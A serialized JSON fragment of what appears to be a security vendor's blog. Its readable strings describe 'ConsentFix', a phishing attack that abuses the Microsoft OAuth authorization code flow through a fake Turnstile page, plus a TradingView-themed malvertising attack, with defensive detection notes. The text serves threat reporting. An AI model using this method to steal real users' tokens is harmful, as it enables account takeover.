1143,"data":51144},[],{},{"nodeType":178,"data":51146,"content":51147},{},[51148,51151],{"nodeType":173,"value":8127,"marks":51149,"data":51150},[],{},{"nodeType":173,"value":8131,"marks":51152,"data":51154},[51153],{"type":370},{},{"nodeType":231,"data":51156,"content":51157},{},[],{"nodeType":169,"data":51159,"content":51160},{},[51161],{"nodeType":173,"value":8142,"marks":51162,"data":51164},[51163],{"type":370},{},{"nodeType":178,"data":51166,"content":51167},{},[51168,51171,51177],{"nodeType":173,"value":8150,"marks":51169,"data":51170},[],{},{"nodeType":186,"data":51172,"content":51173},{"uri":6820},[51174],{"nodeType":173,"value":8157,"marks":51175,"data":51176},[],{},{"nodeType":173,"value":8161,"marks":51178,"data":51179},[],{},{"nodeType":178,"data":51181,"content":51182},{},[51183],{"nodeType":173,"value":8168,"marks":51184,"data":51185},[],{},{"nodeType":178,"data":51187,"content":51188},{},[51189,51192,51196],{"nodeType":173,"value":8175,"marks":51190,"data":51191},[],{},{"nodeType":173,"value":8179,"marks":51193,"data":51195},[51194],{"type":370},{},{"nodeType":173,"value":8184,"marks":51197,"data":51198},[],{},{"nodeType":178,"data":51200,"content":51201},{},[51202],{"nodeType":173,"value":8191,"marks":51203,"data":51204},[],{},{"nodeType":178,"data":51206,"content":51207},{},[51208],{"nodeType":173,"value":8198,"marks":51209,"data":51210},[],{},{"nodeType":312,"data":51212,"content":51215},{"target":51213},{"sys":51214},{"id":8205,"type":317,"linkType":318},[],{"nodeType":178,"data":51217,"content":51218},{},[51219],{"nodeType":173,"value":8211,"marks":51220,"data":51221},[],{},{"nodeType":231,"data":51223,"content":51224},{},[],{"nodeType":169,"data":51226,"content":51227},{},[51228],{"nodeType":173,"value":8221,"marks":51229,"data":51231},[51230],{"type":370},{},{"nodeType":178,"data":51233,"content":51234},{},[51235],{"nodeType":173,"value":8229,"marks":51236,"data":51237},[],{},{"nodeType":250,"data":51239,"content":51240},{},[51241,51250,51259,51268,51277],{"nodeType":254,"data":51242,"content":51243},{},[51244],{"nodeType":178,"data":51245,"content":51246},{},[51247],{"nodeType":173,"value":8242,"marks":51248,"data":51249},[],{},{"nodeType":254,"data":51251,"content":51252},{},[51253],{"nodeType":178,"data":51254,"content":51255},{},[51256],{"nodeType":173,"value":8252,"marks":51257,"data":51258},[],{},{"nodeType":254,"data":51260,"content":51261},{},[51262],{"nodeType":178,"data":51263,"content":51264},{},[51265],{"nodeType":173,"value":8262,"marks":51266,"data":51267},[],{},{"nodeType":254,"data":51269,"content":51270},{},[51271],{"nodeType":178,"data":51272,"content":51273},{},[51274],{"nodeType":173,"value":8272,"marks":51275,"data":51276},[],{},{"nodeType":254,"data":51278,"content":51279},{},[51280],{"nodeType":178,"data":51281,"content":51282},{},[51283],{"nodeType":173,"value":8282,"marks":51284,"data":51285},[],{},{"nodeType":178,"data":51287,"content":51288},{},[51289],{"nodeType":173,"value":8289,"marks":51290,"data":51291},[],{},{"nodeType":231,"data":51293,"content":51294},{},[],{"nodeType":169,"data":51296,"content":51297},{},[51298],{"nodeType":173,"value":8299,"marks":51299,"data":51301},[51300],{"type":370},{},{"nodeType":312,"data":51303,"content":51306},{"target":51304},{"sys":51305},{"id":8307,"type":317,"linkType":318},[],{"nodeType":178,"data":51308,"content":51309},{},[51310],{"nodeType":173,"value":8313,"marks":51311,"data":51312},[],{},{"nodeType":178,"data":51314,"content":51315},{},[51316],{"nodeType":173,"value":8320,"marks":51317,"data":51318},[],{},{"nodeType":312,"data":51320,"content":51323},{"target":51321},{"sys":51322},{"id":8327,"type":317,"linkType":318},[],{"nodeType":178,"data":51325,"content":51326},{},[51327],{"nodeType":173,"value":8333,"marks":51328,"data":51329},[],{},{"nodeType":250,"data":51331,"content":51332},{},[51333,51346],{"nodeType":254,"data":51334,"content":51335},{},[51336],{"nodeType":178,"data":51337,"content":51338},{},[51339,51343],{"nodeType":173,"value":8346,"marks":51340,"data":51342},[51341],{"type":370},{},{"nodeType":173,"value":8351,"marks":51344,"data":51345},[],{},{"nodeType":254,"data":51347,"content":51348},{},[51349],{"nodeType":178,"data":51350,"content":51351},{},[51352,51356],{"nodeType":173,"value":8361,"marks":51353,"data":51355},[51354],{"type":370},{},{"nodeType":173,"value":8366,"marks":51357,"data":51358},[],{},{"nodeType":178,"data":51360,"content":51361},{},[51362],{"nodeType":173,"value":8373,"marks":51363,"data":51364},[],{},{"nodeType":178,"data":51366,"content":51367},{},[51368],{"nodeType":173,"value":8380,"marks":51369,"data":51370},[],{},{"nodeType":312,"data":51372,"content":51375},{"target":51373},{"sys":51374},{"id":8387,"type":317,"linkType":318},[],{"nodeType":178,"data":51377,"content":51378},{},[51379],{"nodeType":173,"value":8393,"marks":51380,"data":51381},[],{},{"nodeType":312,"data":51383,"content":51386},{"target":51384},{"sys":51385},{"id":8400,"type":317,"linkType":318},[],{"nodeType":235,"data":51388,"content":51389},{},[51390],{"nodeType":173,"value":8406,"marks":51391,"data":51393},[51392],{"type":370},{},{"nodeType":178,"data":51395,"content":51396},{},[51397,51400,51407],{"nodeType":173,"value":8414,"marks":51398,"data":51399},[],{},{"nodeType":186,"data":51401,"content":51402},{"uri":8419},[51403],{"nodeType":173,"value":8422,"marks":51404,"data":51406},[51405],{"type":194},{},{"nodeType":173,"value":8427,"marks":51408,"data":51409},[],{},{"nodeType":178,"data":51411,"content":51412},{},[51413],{"nodeType":173,"value":8434,"marks":51414,"data":51415},[],{},{"nodeType":250,"data":51417,"content":51418},{},[51419,51428,51437],{"nodeType":254,"data":51420,"content":51421},{},[51422],{"nodeType":178,"data":51423,"content":51424},{},[51425],{"nodeType":173,"value":8447,"marks":51426,"data":51427},[],{},{"nodeType":254,"data":51429,"content":51430},{},[51431],{"nodeType":178,"data":51432,"content":51433},{},[51434],{"nodeType":173,"value":8457,"marks":51435,"data":51436},[],{},{"nodeType":254,"data":51438,"content":51439},{},[51440],{"nodeType":178,"data":51441,"content":51442},{},[51443],{"nodeType":173,"value":8467,"marks":51444,"data":51445},[],{},{"nodeType":178,"data":51447,"content":51448},{},[51449],{"nodeType":173,"value":8474,"marks":51450,"data":51451},[],{},{"nodeType":250,"data":51453,"content":51454},{},[51455,51464,51473],{"nodeType":254,"data":51456,"content":51457},{},[51458],{"nodeType":178,"data":51459,"content":51460},{},[51461],{"nodeType":173,"value":8487,"marks":51462,"data":51463},[],{},{"nodeType":254,"data":51465,"content":51466},{},[51467],{"nodeType":178,"data":51468,"content":51469},{},[51470],{"nodeType":173,"value":8497,"marks":51471,"data":51472},[],{},{"nodeType":254,"data":51474,"content":51475},{},[51476],{"nodeType":178,"data":51477,"content":51478},{},[51479],{"nodeType":173,"value":8507,"marks":51480,"data":51481},[],{},{"nodeType":231,"data":51483,"content":51484},{},[],{"nodeType":169,"data":51486,"content":51487},{},[51488],{"nodeType":173,"value":8517,"marks":51489,"data":51491},[51490],{"type":370},{},{"nodeType":178,"data":51493,"content":51494},{},[51495],{"nodeType":173,"value":8525,"marks":51496,"data":51497},[],{},{"nodeType":312,"data":51499,"content":51502},{"target":51500},{"sys":51501},{"id":8532,"type":317,"linkType":318},[],{"nodeType":178,"data":51504,"content":51505},{},[51506,51509,51516],{"nodeType":173,"value":8538,"marks":51507,"data":51508},[],{},{"nodeType":186,"data":51510,"content":51511},{"uri":6820},[51512],{"nodeType":173,"value":8545,"marks":51513,"data":51515},[51514],{"type":194},{},{"nodeType":173,"value":8550,"marks":51517,"data":51518},[],{},{"nodeType":178,"data":51520,"content":51521},{},[51522],{"nodeType":173,"value":8557,"marks":51523,"data":51524},[],{},{"nodeType":178,"data":51526,"content":51527},{},[51528,51531,51538,51541,51548],{"nodeType":173,"value":1451,"marks":51529,"data":51530},[],{},{"nodeType":186,"data":51532,"content":51533},{"uri":1456},[51534],{"nodeType":173,"value":1459,"marks":51535,"data":51537},[51536],{"type":194},{},{"nodeType":173,"value":1464,"marks":51539,"data":51540},[],{},{"nodeType":186,"data":51542,"content":51543},{"uri":1469},[51544],{"nodeType":173,"value":1472,"marks":51545,"data":51547},[51546],{"type":194},{},{"nodeType":173,"value":1477,"marks":51549,"data":51550},[],{},{"nodeType":312,"data":51552,"content":51555},{"target":51553},{"sys":51554},{"id":8590,"type":317,"linkType":318},[],{"nodeType":178,"data":51557,"content":51558},{},[51559],{"nodeType":173,"value":37,"marks":51560,"data":51561},[],{},{"entries":51563},{"hyperlink":51564,"inline":51565,"block":51566},[],[],[51567,51593,51601,51608,51614,51619,51625,51628,51632,51635,51640,51664,51671,51678,51708,51715],{"sys":51568,"__typename":5311,"content":51569,"name":51592,"title":118},{"id":7805},{"json":51570},{"nodeType":165,"data":51571,"content":51572},{},[51573],{"nodeType":178,"data":51574,"content":51575},{},[51576,51579,51588],{"nodeType":173,"value":37,"marks":51577,"data":51578},[],{},{"nodeType":186,"data":51580,"content":51582},{"uri":51581},"https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow",[51583],{"nodeType":173,"value":51584,"marks":51585,"data":51587},"Authorization code flow",[51586],{"type":194},{},{"nodeType":173,"value":51589,"marks":51590,"data":51591}," is an OAuth 2.0 protocol for web applications to get a user's permission to access protected resources. When using the authorization code flow to connect an app, it combines the code with an OAuth secret held by the app in exchange for a token (the valuable part). However, some apps can’t protect a secret — for example, apps that run on your mobile device or desktop. In this case, the code alone is enough to generate an OAuth token, without the secret — which is what is being exploited here.",[],{},"ConsentFix Insight Box 1",{"sys":51594,"__typename":5345,"title":51595,"caption":51596,"layoutMode":118,"file":51597},{"id":7811},"Authorization code flow in Microsoft apps.","Authorization code flow for Microsoft apps.",{"url":51598,"width":51599,"height":51600},"https://images.ctfassets.net/y1cdw1ablpvd/39SjQQIFV5aDh4Xq90X1BX/59ff8127bd758e34620738e2cecc0341/image2.png",1656,1064,{"sys":51602,"__typename":5345,"title":51603,"caption":51603,"layoutMode":118,"file":51604},{"id":7842},"Fake Cloudflare Turnstile page requesting a valid email address.",{"url":51605,"width":51606,"height":51607},"https://images.ctfassets.net/y1cdw1ablpvd/7bkcFEo59SUYRyBOAHfj6G/f8a49793c6190bea9007753ad1a93159/image_683.png",1446,546,{"sys":51609,"__typename":5345,"title":51610,"caption":51610,"layoutMode":118,"file":51611},{"id":7875},"If a personal email address is used, a business address is prompted.",{"url":51612,"width":5358,"height":51613},"https://images.ctfassets.net/y1cdw1ablpvd/7CNNGeywhNK5XJaGs1wC08/3a948187b0cadb8f1989db04d233ce49/image5.png",958,{"sys":51615,"__typename":5345,"title":51616,"caption":51616,"layoutMode":118,"file":51617},{"id":7888},"The victim is prompted to complete a further verification check.",{"url":51618,"width":49198,"height":49199},"https://images.ctfassets.net/y1cdw1ablpvd/m8UjkvISMPYalhzlpFrHq/b31f330ce1d49e242f0b4185b154d3e2/image_694__1_.png",{"sys":51620,"__typename":5345,"title":51621,"caption":51621,"layoutMode":118,"file":51622},{"id":7944},"Response on the malicious page, showing the response URL and redirect. The client_id is specific to the Azure CLI app.",{"url":51623,"width":5358,"height":51624},"https://images.ctfassets.net/y1cdw1ablpvd/24oliBnRyryM1MGM06rqUh/4e6dd173756c8f472601b9665155d27b/image1.png",1051,{"sys":51626,"__typename":5345,"title":38129,"caption":38130,"layoutMode":118,"file":51627},{"id":7950},{"url":38132,"width":5358,"height":40},{"sys":51629,"__typename":5434,"title":51630,"arcadeDemoUrl":51631,"playText":5437},{"id":8008},"ConsentFix Demo","https://demo.arcade.software/jVg07nEAWrkdzyRc4S83?embed",{"sys":51633,"__typename":5434,"title":21090,"arcadeDemoUrl":51634,"playText":27947},{"id":8032},"https://demo.arcade.software/yQIHbuD990Dk5CjI1cvS?embed",{"sys":51636,"__typename":5434,"title":51637,"arcadeDemoUrl":51638,"playText":51639},{"id":8205},"ConsentFix Denied Access","https://demo.arcade.software/3zw2WIpCdCI2FhnEbLH7?embed","1 min",{"sys":51641,"__typename":5311,"content":51642,"name":51663,"title":118},{"id":8307},{"json":51643},{"nodeType":165,"data":51644,"content":51645},{},[51646],{"nodeType":178,"data":51647,"content":51648},{},[51649,51653,51660],{"nodeType":173,"value":51650,"marks":51651,"data":51652},"Since releasing this research, the security community has jumped on ConsentFix, discovering several additional vulnerable Microsoft apps, and sharing a variety of Microsoft-specific mitigation and detection guidance. You can find this information aggregated ",[],{},{"nodeType":186,"data":51654,"content":51655},{"uri":32260},[51656],{"nodeType":173,"value":51657,"marks":51658,"data":51659},"in our follow-up blog post here",[],{},{"nodeType":173,"value":2340,"marks":51661,"data":51662},[],{},"ConsentFix Insight Box 4",{"sys":51665,"__typename":5345,"title":51666,"caption":51666,"layoutMode":118,"file":51667},{"id":8327},"Microsoft log examples.",{"url":51668,"width":51669,"height":51670},"https://images.ctfassets.net/y1cdw1ablpvd/66hEuuZyciE7RPKR7tpZz4/c75ef643729ddd93cf5850dbe7a81617/image8.png",1794,240,{"sys":51672,"__typename":5345,"title":51673,"caption":51673,"layoutMode":118,"file":51674},{"id":8387},"Non-interactive logins observed from IP addresses in the US and Indonesia. ",{"url":51675,"width":51676,"height":51677},"https://images.ctfassets.net/y1cdw1ablpvd/76x7GAQzcmzaM30BvyBDNS/33b84a9d8c7a4ac088f080df705841dd/image9.png",1838,316,{"sys":51679,"__typename":5311,"content":51680,"name":51707,"title":118},{"id":8400},{"json":51681},{"nodeType":165,"data":51682,"content":51683},{},[51684],{"nodeType":178,"data":51685,"content":51686},{},[51687,51692,51696,51703],{"nodeType":173,"value":51688,"marks":51689,"data":51691},"Note: ",[51690],{"type":370},{},{"nodeType":173,"value":51693,"marks":51694,"data":51695},"The attacker is intentionally leveraging legacy scopes to evade detection. You should ensure that ",[],{},{"nodeType":186,"data":51697,"content":51698},{"uri":20342},[51699],{"nodeType":173,"value":20345,"marks":51700,"data":51702},[51701],{"type":194},{},{"nodeType":173,"value":51704,"marks":51705,"data":51706}," is enabled and monitored to be able to search for unusual activity such as AD enumeration.",[],{},"ConsentFix Insight Box 3",{"sys":51709,"__typename":5345,"title":51710,"caption":51710,"layoutMode":118,"file":51711},{"id":8532},"Detection timeline showing the page being detected and blocked by Push.",{"url":51712,"width":51713,"height":51714},"https://images.ctfassets.net/y1cdw1ablpvd/4H7j3s8F1FuyrGBvgSFs5a/882bf3ec5e477031fda0fde3223832f9/Group_594__1_.png",2328,1116,{"sys":51716,"__typename":15269,"type":15270,"ctaText":49208,"buttonLabel":15277,"buttonColour":15273,"buttonUrl":49143},{"id":8590},"content:blog:consentfix.json","blog/consentfix.json","blog/consentfix",{"_path":51721,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":51722,"ogImage":118,"summary":51724,"title":41302,"subtitle":118,"metaTitle":51735,"synopsis":41303,"hashTags":118,"publishedDate":41304,"slug":41305,"tagsCollection":51736,"relatedBlogPostsCollection":51742,"authorsCollection":53121,"content":53125,"_id":53624,"_type":5439,"_source":5440,"_file":53625,"_stem":53626,"_extension":5439},"/blog/analysing-a-sophisticated-google-malvertising-attack",{"id":40881,"publishedAt":51723},"2025-12-08T12:32:23.985Z",{"json":51725},{"data":51726,"content":51727,"nodeType":165},{},[51728],{"data":51729,"content":51730,"nodeType":178},{},[51731],{"data":51732,"marks":51733,"value":51734,"nodeType":173},{},[],"Push recently detected and blocked a malvertising attack impersonating TradingView, designed to hijack Google Workspace accounts via Attacker-in-the-Middle phishing. Here’s what you need to know. ","Analysing a sophisticated Google malvertising attack",{"items":51737},[51738,51740],{"sys":51739,"name":505},{"id":504},{"sys":51741,"name":509},{"id":508},{"items":51743},[51744,52092,52612],{"__typename":1528,"sys":51745,"content":51746,"title":41689,"synopsis":41690,"hashTags":118,"publishedDate":41691,"slug":41692,"tagsCollection":52082,"authorsCollection":52088},{"id":24155},{"json":51747},{"data":51748,"content":51749,"nodeType":165},{},[51750,51757,51763,51768,51774,51804,51810,51815,51821,51826,51831,51836,51841,51846,51849,51856,51862,51868,51874,51881,51886,51902,51908,51924,51929,51932,51939,51945,52011,52017,52020,52027,52033,52039,52045,52071,52076],{"data":51751,"content":51752,"nodeType":169},{},[51753],{"data":51754,"marks":51755,"value":14096,"nodeType":173},{},[51756],{"type":370},{"data":51758,"content":51759,"nodeType":178},{},[51760],{"data":51761,"marks":51762,"value":41335,"nodeType":173},{},[],{"data":51764,"content":51767,"nodeType":312},{"target":51765},{"sys":51766},{"id":41340,"type":317,"linkType":318},[],{"data":51769,"content":51770,"nodeType":178},{},[51771],{"data":51772,"marks":51773,"value":41348,"nodeType":173},{},[],{"data":51775,"content":51776,"nodeType":250},{},[51777,51786,51795],{"data":51778,"content":51779,"nodeType":254},{},[51780],{"data":51781,"content":51782,"nodeType":178},{},[51783],{"data":51784,"marks":51785,"value":41361,"nodeType":173},{},[],{"data":51787,"content":51788,"nodeType":254},{},[51789],{"data":51790,"content":51791,"nodeType":178},{},[51792],{"data":51793,"marks":51794,"value":41371,"nodeType":173},{},[],{"data":51796,"content":51797,"nodeType":254},{},[51798],{"data":51799,"content":51800,"nodeType":178},{},[51801],{"data":51802,"marks":51803,"value":41381,"nodeType":173},{},[],{"data":51805,"content":51806,"nodeType":178},{},[51807],{"data":51808,"marks":51809,"value":41388,"nodeType":173},{},[],{"data":51811,"content":51814,"nodeType":312},{"target":51812},{"sys":51813},{"id":41393,"type":317,"linkType":318},[],{"data":51816,"content":51817,"nodeType":178},{},[51818],{"data":51819,"marks":51820,"value":41401,"nodeType":173},{},[],{"data":51822,"content":51825,"nodeType":312},{"target":51823},{"sys":51824},{"id":41406,"type":317,"linkType":318},[],{"data":51827,"content":51830,"nodeType":312},{"target":51828},{"sys":51829},{"id":41412,"type":317,"linkType":318},[],{"data":51832,"content":51835,"nodeType":312},{"target":51833},{"sys":51834},{"id":41418,"type":317,"linkType":318},[],{"data":51837,"content":51840,"nodeType":312},{"target":51838},{"sys":51839},{"id":41424,"type":317,"linkType":318},[],{"data":51842,"content":51845,"nodeType":312},{"target":51843},{"sys":51844},{"id":41430,"type":317,"linkType":318},[],{"data":51847,"content":51848,"nodeType":231},{},[],{"data":51850,"content":51851,"nodeType":169},{},[51852],{"data":51853,"marks":51854,"value":41442,"nodeType":173},{},[51855],{"type":370},{"data":51857,"content":51858,"nodeType":178},{},[51859],{"data":51860,"marks":51861,"value":41449,"nodeType":173},{},[],{"data":51863,"content":51864,"nodeType":178},{},[51865],{"data":51866,"marks":51867,"value":41456,"nodeType":173},{},[],{"data":51869,"content":51870,"nodeType":178},{},[51871],{"data":51872,"marks":51873,"value":41463,"nodeType":173},{},[],{"data":51875,"content":51876,"nodeType":178},{},[51877],{"data":51878,"marks":51879,"value":41471,"nodeType":173},{},[51880],{"type":370},{"data":51882,"content":51885,"nodeType":312},{"target":51883},{"sys":51884},{"id":41476,"type":317,"linkType":318},[],{"data":51887,"content":51888,"nodeType":178},{},[51889,51892,51899],{"data":51890,"marks":51891,"value":41484,"nodeType":173},{},[],{"data":51893,"content":51894,"nodeType":186},{"uri":1842},[51895],{"data":51896,"marks":51897,"value":1845,"nodeType":173},{},[51898],{"type":194},{"data":51900,"marks":51901,"value":41495,"nodeType":173},{},[],{"data":51903,"content":51904,"nodeType":178},{},[51905],{"data":51906,"marks":51907,"value":41502,"nodeType":173},{},[],{"data":51909,"content":51910,"nodeType":178},{},[51911,51914,51921],{"data":51912,"marks":51913,"value":41509,"nodeType":173},{},[],{"data":51915,"content":51916,"nodeType":186},{"uri":5002},[51917],{"data":51918,"marks":51919,"value":6811,"nodeType":173},{},[51920],{"type":194},{"data":51922,"marks":51923,"value":41073,"nodeType":173},{},[],{"data":51925,"content":51928,"nodeType":312},{"target":51926},{"sys":51927},{"id":8590,"type":317,"linkType":318},[],{"data":51930,"content":51931,"nodeType":231},{},[],{"data":51933,"content":51934,"nodeType":169},{},[51935],{"data":51936,"marks":51937,"value":8406,"nodeType":173},{},[51938],{"type":370},{"data":51940,"content":51941,"nodeType":178},{},[51942],{"data":51943,"marks":51944,"value":41541,"nodeType":173},{},[],{"data":51946,"content":51947,"nodeType":250},{},[51948,51957,51966,51975,51984,51993,52002],{"data":51949,"content":51950,"nodeType":254},{},[51951],{"data":51952,"content":51953,"nodeType":178},{},[51954],{"data":51955,"marks":51956,"value":41554,"nodeType":173},{},[],{"data":51958,"content":51959,"nodeType":254},{},[51960],{"data":51961,"content":51962,"nodeType":178},{},[51963],{"data":51964,"marks":51965,"value":41564,"nodeType":173},{},[],{"data":51967,"content":51968,"nodeType":254},{},[51969],{"data":51970,"content":51971,"nodeType":178},{},[51972],{"data":51973,"marks":51974,"value":41574,"nodeType":173},{},[],{"data":51976,"content":51977,"nodeType":254},{},[51978],{"data":51979,"content":51980,"nodeType":178},{},[51981],{"data":51982,"marks":51983,"value":41584,"nodeType":173},{},[],{"data":51985,"content":51986,"nodeType":254},{},[51987],{"data":51988,"content":51989,"nodeType":178},{},[51990],{"data":51991,"marks":51992,"value":41594,"nodeType":173},{},[],{"data":51994,"content":51995,"nodeType":254},{},[51996],{"data":51997,"content":51998,"nodeType":178},{},[51999],{"data":52000,"marks":52001,"value":41604,"nodeType":173},{},[],{"data":52003,"content":52004,"nodeType":254},{},[52005],{"data":52006,"content":52007,"nodeType":178},{},[52008],{"data":52009,"marks":52010,"value":41614,"nodeType":173},{},[],{"data":52012,"content":52013,"nodeType":178},{},[52014],{"data":52015,"marks":52016,"value":41621,"nodeType":173},{},[],{"data":52018,"content":52019,"nodeType":231},{},[],{"data":52021,"content":52022,"nodeType":169},{},[52023],{"data":52024,"marks":52025,"value":8517,"nodeType":173},{},[52026],{"type":370},{"data":52028,"content":52029,"nodeType":178},{},[52030],{"data":52031,"marks":52032,"value":41638,"nodeType":173},{},[],{"data":52034,"content":52035,"nodeType":178},{},[52036],{"data":52037,"marks":52038,"value":41645,"nodeType":173},{},[],{"data":52040,"content":52041,"nodeType":178},{},[52042],{"data":52043,"marks":52044,"value":14340,"nodeType":173},{},[],{"data":52046,"content":52047,"nodeType":178},{},[52048,52051,52058,52061,52068],{"data":52049,"marks":52050,"value":1451,"nodeType":173},{},[],{"data":52052,"content":52053,"nodeType":186},{"uri":1456},[52054],{"data":52055,"marks":52056,"value":1459,"nodeType":173},{},[52057],{"type":194},{"data":52059,"marks":52060,"value":1464,"nodeType":173},{},[],{"data":52062,"content":52063,"nodeType":186},{"uri":1469},[52064],{"data":52065,"marks":52066,"value":1472,"nodeType":173},{},[52067],{"type":194},{"data":52069,"marks":52070,"value":1477,"nodeType":173},{},[],{"data":52072,"content":52075,"nodeType":312},{"target":52073},{"sys":52074},{"id":8590,"type":317,"linkType":318},[],{"data":52077,"content":52078,"nodeType":178},{},[52079],{"data":52080,"marks":52081,"value":37,"nodeType":173},{},[],{"items":52083},[52084,52086],{"sys":52085,"name":509},{"id":508},{"sys":52087,"name":505},{"id":504},{"items":52089},[52090],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":52091},{"url":1496},{"__typename":1528,"sys":52093,"content":52094,"title":42282,"synopsis":42283,"hashTags":118,"publishedDate":41691,"slug":42284,"tagsCollection":52602,"authorsCollection":52608},{"id":41705},{"json":52095},{"data":52096,"content":52097,"nodeType":165},{},[52098,52104,52110,52116,52121,52127,52130,52137,52143,52149,52155,52160,52166,52171,52177,52182,52188,52193,52219,52225,52230,52236,52241,52247,52252,52258,52297,52300,52307,52313,52319,52325,52330,52333,52340,52346,52362,52367,52372,52377,52383,52388,52393,52409,52412,52419,52435,52440,52446,52462,52469,52475,52481,52487,52503,52510,52516,52521,52524,52531,52537,52543,52546,52553,52559,52565,52591,52596],{"data":52099,"content":52100,"nodeType":178},{},[52101],{"data":52102,"marks":52103,"value":41716,"nodeType":173},{},[],{"data":52105,"content":52106,"nodeType":178},{},[52107],{"data":52108,"marks":52109,"value":41723,"nodeType":173},{},[],{"data":52111,"content":52112,"nodeType":178},{},[52113],{"data":52114,"marks":52115,"value":41730,"nodeType":173},{},[],{"data":52117,"content":52120,"nodeType":312},{"target":52118},{"sys":52119},{"id":41735,"type":317,"linkType":318},[],{"data":52122,"content":52123,"nodeType":178},{},[52124],{"data":52125,"marks":52126,"value":41743,"nodeType":173},{},[],{"data":52128,"content":52129,"nodeType":231},{},[],{"data":52131,"content":52132,"nodeType":169},{},[52133],{"data":52134,"marks":52135,"value":41754,"nodeType":173},{},[52136],{"type":370},{"data":52138,"content":52139,"nodeType":178},{},[52140],{"data":52141,"marks":52142,"value":41761,"nodeType":173},{},[],{"data":52144,"content":52145,"nodeType":178},{},[52146],{"data":52147,"marks":52148,"value":41768,"nodeType":173},{},[],{"data":52150,"content":52151,"nodeType":178},{},[52152],{"data":52153,"marks":52154,"value":41775,"nodeType":173},{},[],{"data":52156,"content":52159,"nodeType":312},{"target":52157},{"sys":52158},{"id":41780,"type":317,"linkType":318},[],{"data":52161,"content":52162,"nodeType":178},{},[52163],{"data":52164,"marks":52165,"value":41788,"nodeType":173},{},[],{"data":52167,"content":52170,"nodeType":312},{"target":52168},{"sys":52169},{"id":41793,"type":317,"linkType":318},[],{"data":52172,"content":52173,"nodeType":178},{},[52174],{"data":52175,"marks":52176,"value":41801,"nodeType":173},{},[],{"data":52178,"content":52181,"nodeType":312},{"target":52179},{"sys":52180},{"id":41806,"type":317,"linkType":318},[],{"data":52183,"content":52184,"nodeType":178},{},[52185],{"data":52186,"marks":52187,"value":41814,"nodeType":173},{},[],{"data":52189,"content":52192,"nodeType":312},{"target":52190},{"sys":52191},{"id":41819,"type":317,"linkType":318},[],{"data":52194,"content":52195,"nodeType":178},{},[52196,52199,52206,52209,52216],{"data":52197,"marks":52198,"value":41827,"nodeType":173},{},[],{"data":52200,"content":52201,"nodeType":186},{"uri":7853},[52202],{"data":52203,"marks":52204,"value":41835,"nodeType":173},{},[52205],{"type":194},{"data":52207,"marks":52208,"value":41839,"nodeType":173},{},[],{"data":52210,"content":52211,"nodeType":186},{"uri":6820},[52212],{"data":52213,"marks":52214,"value":13298,"nodeType":173},{},[52215],{"type":194},{"data":52217,"marks":52218,"value":41850,"nodeType":173},{},[],{"data":52220,"content":52221,"nodeType":178},{},[52222],{"data":52223,"marks":52224,"value":41857,"nodeType":173},{},[],{"data":52226,"content":52229,"nodeType":312},{"target":52227},{"sys":52228},{"id":41862,"type":317,"linkType":318},[],{"data":52231,"content":52232,"nodeType":178},{},[52233],{"data":52234,"marks":52235,"value":41870,"nodeType":173},{},[],{"data":52237,"content":52240,"nodeType":312},{"target":52238},{"sys":52239},{"id":41875,"type":317,"linkType":318},[],{"data":52242,"content":52243,"nodeType":178},{},[52244],{"data":52245,"marks":52246,"value":41883,"nodeType":173},{},[],{"data":52248,"content":52251,"nodeType":312},{"target":52249},{"sys":52250},{"id":41888,"type":317,"linkType":318},[],{"data":52253,"content":52254,"nodeType":178},{},[52255],{"data":52256,"marks":52257,"value":41896,"nodeType":173},{},[],{"data":52259,"content":52260,"nodeType":250},{},[52261,52270,52279,52288],{"data":52262,"content":52263,"nodeType":254},{},[52264],{"data":52265,"content":52266,"nodeType":178},{},[52267],{"data":52268,"marks":52269,"value":41909,"nodeType":173},{},[],{"data":52271,"content":52272,"nodeType":254},{},[52273],{"data":52274,"content":52275,"nodeType":178},{},[52276],{"data":52277,"marks":52278,"value":41919,"nodeType":173},{},[],{"data":52280,"content":52281,"nodeType":254},{},[52282],{"data":52283,"content":52284,"nodeType":178},{},[52285],{"data":52286,"marks":52287,"value":41929,"nodeType":173},{},[],{"data":52289,"content":52290,"nodeType":254},{},[52291],{"data":52292,"content":52293,"nodeType":178},{},[52294],{"data":52295,"marks":52296,"value":41939,"nodeType":173},{},[],{"data":52298,"content":52299,"nodeType":231},{},[],{"data":52301,"content":52302,"nodeType":169},{},[52303],{"data":52304,"marks":52305,"value":41950,"nodeType":173},{},[52306],{"type":370},{"data":52308,"content":52309,"nodeType":178},{},[52310],{"data":52311,"marks":52312,"value":41957,"nodeType":173},{},[],{"data":52314,"content":52315,"nodeType":178},{},[52316],{"data":52317,"marks":52318,"value":41964,"nodeType":173},{},[],{"data":52320,"content":52321,"nodeType":178},{},[52322],{"data":52323,"marks":52324,"value":41971,"nodeType":173},{},[],{"data":52326,"content":52329,"nodeType":312},{"target":52327},{"sys":52328},{"id":41976,"type":317,"linkType":318},[],{"data":52331,"content":52332,"nodeType":231},{},[],{"data":52334,"content":52335,"nodeType":169},{},[52336],{"data":52337,"marks":52338,"value":41988,"nodeType":173},{},[52339],{"type":370},{"data":52341,"content":52342,"nodeType":178},{},[52343],{"data":52344,"marks":52345,"value":41995,"nodeType":173},{},[],{"data":52347,"content":52348,"nodeType":178},{},[52349,52352,52359],{"data":52350,"marks":52351,"value":42002,"nodeType":173},{},[],{"data":52353,"content":52354,"nodeType":186},{"uri":42005},[52355],{"data":52356,"marks":52357,"value":42011,"nodeType":173},{},[52358],{"type":194},{"data":52360,"marks":52361,"value":42015,"nodeType":173},{},[],{"data":52363,"content":52366,"nodeType":312},{"target":52364},{"sys":52365},{"id":42020,"type":317,"linkType":318},[],{"data":52368,"content":52371,"nodeType":312},{"target":52369},{"sys":52370},{"id":42026,"type":317,"linkType":318},[],{"data":52373,"content":52376,"nodeType":312},{"target":52374},{"sys":52375},{"id":42032,"type":317,"linkType":318},[],{"data":52378,"content":52379,"nodeType":178},{},[52380],{"data":52381,"marks":52382,"value":42040,"nodeType":173},{},[],{"data":52384,"content":52387,"nodeType":312},{"target":52385},{"sys":52386},{"id":42045,"type":317,"linkType":318},[],{"data":52389,"content":52392,"nodeType":312},{"target":52390},{"sys":52391},{"id":42051,"type":317,"linkType":318},[],{"data":52394,"content":52395,"nodeType":178},{},[52396,52399,52406],{"data":52397,"marks":52398,"value":42059,"nodeType":173},{},[],{"data":52400,"content":52401,"nodeType":186},{"uri":42062},[52402],{"data":52403,"marks":52404,"value":42068,"node